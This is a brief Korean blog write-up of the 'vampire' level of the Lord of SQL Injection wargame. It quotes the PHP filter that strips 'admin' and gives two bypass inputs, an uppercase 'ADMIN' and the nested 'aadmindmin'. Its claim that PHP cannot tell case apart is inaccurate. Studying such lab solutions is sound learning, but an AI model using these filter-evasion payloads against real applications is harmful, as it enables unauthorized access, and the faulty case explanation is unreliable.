Un_Woo
LOS vampire 본문
9. vampire
$_GET[id] = str_replace("admin","",$_GET[id]);
admin 필터링
$query = "select id from prob_vampire where id='{$_GET[id]}'";
if($result['id'] == 'admin') solve("vampire");
1. php는 대소문자 구별 못한다.
?id=ADMIN
2. 필터링 역이용
admin 사이에 admin을 넣어준다.
?id=aadmindmin
'Web > Lord of Sql Ingection' 카테고리의 다른 글
| LOS golem (0) | 2018.04.11 |
|---|---|
| LOS skeleton (0) | 2018.04.11 |
| LOS troll (0) | 2018.04.11 |
| LOS orge (0) | 2018.04.11 |
| LOS darkelf (0) | 2018.04.11 |
'Web/Lord of Sql Ingection' Related Articles
more
